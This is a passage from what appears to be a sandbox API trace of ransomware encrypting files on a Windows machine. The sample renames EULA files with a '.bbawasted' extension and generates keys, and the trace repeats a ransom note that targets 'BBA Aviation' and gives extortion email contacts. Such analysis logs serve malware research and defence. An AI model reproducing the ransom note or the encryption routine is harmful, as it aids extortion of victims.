"c:\\windows10upgrade\\resources\\ux\\eula\\eula_sk-sk.htm.bbawasted")) returned 1 [0237.765] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sk-sk.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0237.765] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0237.765] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x14021 [0237.765] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14021) returned 0x5f0000 [0237.765] CloseHandle (hObject=0x27c) returned 1 [0237.861] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0237.862] CloseHandle (hObject=0x294) returned 1 [0237.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa1d0 [0237.862] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6ac0) returned 1 [0237.863] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x1b8, pbBuffer=0x6aa218 | out: pbBuffer=0x6aa218) returned 1 [0237.863] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0237.863] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0237.864] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0237.864] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0237.891] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0237.891] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa1d0 | out: hHeap=0x660000) returned 1 [0237.891] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.892] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]eZVjtqe3LZtsimRSqaOTY2NUWgzLFexzWrEltVqOy+w9pOr1Hi/+H2Pj1ndcUGjj\r\nU7KRQpiTK+uikiwDNlMx/QW+9z73fwS1a9x9xPmWTwsD7W1DDRg+wI2/gFSOsyd3\r\ncVFHAmm3vg7ACkt4O2aWf6H2g+Y52vE/XujoAAXXAYMMtuyu2wlbN48k1MtgqSKf\r\n1+DA/eB9E/JcPC4xXqM/WyF0I6eaNTeaAAZ3t7Y4/IzV49DL1FbBvAqQi5FvcMqP\r\njtd5yGX3yRYgMaeKdHPZ+pV3cZX/09lBJeUZ7X3FQk9437iCMRGA5J+a94+ldBgo\r\nAGRbU+ty0Djf7FDumiVF4YuK3o9spJyfSPJU5fk+HrKnf4gBe0Zf1vDY852d6ZUZ\r\nzxlFp9kqv6PsEHxXcLSyqIxHxzDaDZRe6n+olkQ7NmppoZPRnUVXk3AaptVf01up\r\nVEVBBrAx3MfEQeA+/wNqUtPv0//nJ+apOczx26jN9Nf+5qPR6M9Ua/nCV3GawRbU\r\nxaIpS5tvtmX1rGxWPx5UNDO5RSXMhHYY5grvJ8xkUy/M8/kg5E97xqQC8w2xw2Tq\r\nzUn5ZTjwrWf4sU4oZfOGWKaFH/4jh5GCrYDCYbtcy+TMxzLzpwpla4CQ69PzAiKa\r\nM3XuHsrq2UOE4pS9F974+3rI0oTNzp9SHwlHbXHUH0b=[end_key]\r\nKEEP IT\r\n") returned 984 [0237.892] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0237.892] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0237.892] SetEndOfFile (hFile=0x290) returned 1 [0237.896] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0237.896] CloseHandle (hObject=0x290) returned 1 [0237.896] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0237.897] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c0ba8 | out: hHeap=0x660000) returned 1 [0237.897] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6ce0) returned 1 [0237.898] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0237.898] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0237.898] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm") returned 61 [0237.898] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x284) returned 0x6c4b88 [0237.899] lstrcpyW (in: lpString1=0x6c4c02, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0237.899] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0237.899] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f98) returned 1 [0237.899] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0237.899] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0237.900] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sr-latn-cs.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0238.216] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.217] SetEndOfFile (hFile=0x27c) returned 1 [0238.218] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.218] lstrcpyW (in: lpString1=0x6c4c02, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.218] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sr-latn-cs.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sr-latn-cs.htm.bbawasted")) returned 1 [0238.220] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sr-latn-cs.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0238.220] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0238.221] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x12720 [0238.221] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12720) returned 0x5f0000 [0238.221] CloseHandle (hObject=0x290) returned 1 [0238.225] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0238.226] CloseHandle (hObject=0x294) returned 1 [0238.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa3d8 [0238.226] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a64e8) returned 1 [0238.227] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x6aa420 | out: pbBuffer=0x6aa420) returned 1 [0238.227] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0238.227] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0238.228] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0238.228] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0238.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0238.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa3d8 | out: hHeap=0x660000) returned 1 [0238.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.238] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]s3IvUEZH9YwM9lFA6tkgoDALmJ7SZnZ1H9/5+ov9NqzFQDYtjMJ3xUSIf856yqHS\r\nSqr+qKHwS4piQXua3sj5Fim8xS95mdhMPcufMpKHTAsKlSjyoRQ/aw+97I1fQMhI\r\nq855KRqqxLz+E5YCKtlrDngiDItmgS1M8+/ee4sqjrYtuVOKGnN+qbClqmsTJYhD\r\nCVKkypEJhYnarrVXUw2y/NTxwMj01c1m9MPPFK4tDiQoUAkm5N9JdthaN/bGroFY\r\nec6c938QMlh8BJdDkZHmLK2HRHTO1GbI6BjoI7TOSRuDhbLyudMDbJKvoS1fxZYb\r\n1nyLQptnHQEGKhQRW2IL6iM6ysElFzrbQHjaiud5tvU5gcrCixP31ZoOJmJ1drFU\r\nu5/qclWWJKXBhOcdWDr8p+CXtqY/zNOLXM7EwJ+Lx0nv6UG8uS+zauCAZxfhxrFS\r\nc3GZiJdb3hjPlw2SjW4vWJpWBU71QF/xk7jYCy3MVBomfkk2LE/DL+dBUi/w3U0F\r\n1q+HnQd5HLNqwZfNOCwlvdMox2hQ2A/3e6ZZMTm9uSP78cTcR7UqTtZnO9S8zGnj\r\nD7Qm8Fh6P134fQzZJnzN4BxAnTeUifTwYTEuoLBPrgH58fAOGXHwnja1WYWsYcdr\r\nEE9wFa87AwlSd8Ew7g86rvpMj498WMgfIKxZure6WDO=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0238.238] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0238.239] SetEndOfFile (hFile=0x27c) returned 1 [0238.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.245] CloseHandle (hObject=0x27c) returned 1 [0238.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0238.246] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7768 | out: hHeap=0x660000) returned 1 [0238.246] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a60a8) returned 1 [0238.247] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0238.247] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0238.247] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm") returned 56 [0238.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0238.247] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.248] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0238.248] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0238.248] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0238.248] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sv-se.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0238.249] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.251] SetEndOfFile (hFile=0x27c) returned 1 [0238.251] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0238.251] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sv-se.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sv-se.htm.bbawasted")) returned 1 [0238.252] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sv-se.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0238.252] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0238.253] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x112f7 [0238.253] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x112f7) returned 0x5f0000 [0238.253] CloseHandle (hObject=0x294) returned 1 [0238.399] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0238.400] CloseHandle (hObject=0x280) returned 1 [0238.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0238.400] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0238.401] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0238.401] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0238.401] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6928) returned 1 [0238.401] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0238.402] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0238.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0238.412] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0238.413] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0238.413] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ih6anjizhw5n7Yf79e6vzkTSJz4GE3wOVFfYneaE71aa004yoa67XY9xdqZ/rFI4\r\naqA1Q9goFwPp39XkhdOmxx51VYxU4tiQDxq9l7r0tkUzc2gZD6s7Y+URLJ8+caI6\r\nO37/C1w2doDc+ghOymg1qAXNBOTcyAFT6PnGfVi4o4EaOGe2N5X7HBA3iZgXANCN\r\nnEizLNtgBYFzxDziCczJtZIq3TkzeJ1ig5wXf8Kbv2BtEDxXmUJx1t3clouHar87\r\nPzxCICaRQBL8wUjMkGBOronhlvw32CaC/RitWY4IoseX+H0STUZwAfcQ+V6RixEI\r\nJ6lX6HkVIXaCokmSZnz/DbOusfADNm2h8sF3qFR+Ml+888YRQGn37L/2c1IfHzl8\r\nQfIKpXHQ3543OrNls0DM6CGUDV2K273cOIlm7NLxAMg5WCkfXSVL/gI4NHJpld/Q\r\nXHXSxzNssfLl6pkcezJ4KeB+OqBPlYiusIQcMkNssfVdHoloOjjIc+XkMXY0pdrO\r\n/u8hBpyoCyY3QZR/4a9JPazRqlliDM65f1HhUn8IwjmeNCANyDXfTFrj/PDkha4z\r\nAES8DkdE+fGPRsW5RfCp+EoRsgCHA7mAas3lhQR9b0ZyD388vzf3amb2HFUEEfq4\r\nS+fuZoBIEM9CF9ngbabzeUwbabRurlCliBBihWHxr5L=[end_key]\r\nKEEP IT\r\n") returned 984 [0238.413] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0238.413] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0238.413] SetEndOfFile (hFile=0x27c) returned 1 [0238.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0238.416] CloseHandle (hObject=0x27c) returned 1 [0238.416] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0238.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c0d48 | out: hHeap=0x660000) returned 1 [0238.417] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a63d8) returned 1 [0238.418] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0238.418] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0238.418] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm") returned 56 [0238.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0238.418] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0238.418] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0238.418] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0238.419] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6ae598 | out: pbBuffer=0x6ae598) returned 1 [0238.419] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0238.419] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_uk-ua.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0238.420] WriteFile (in: hFile=0x27c, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0238.422] SetEndOfFile (hFile=0x27c) returned 1 [0238.422] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0238.422] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0238.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_uk-ua.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_uk-ua.htm.bbawasted")) returned 1 [0238.424] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_uk-ua.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_uk-ua.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0238.424] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0238.425] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x411eb [0238.425] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x411eb) returned 0x1480000 [0238.425] CloseHandle (hObject=0x280) returned 1 [0238.512] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0238.516] CloseHandle (hObject=0x28c) returned 1 [0238.516] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa9f0 [0238.516] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0238.517] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x6aaa38 | out: pbBuffer=0x6aaa38) returned 1 [0238.517] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0238.517] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a64e8) returned 1 [0238.518] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0238.518] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0238.530] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0238.531] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa9f0 | out: hHeap=0x660000) returned 1 [0238.531] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0238.531] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE 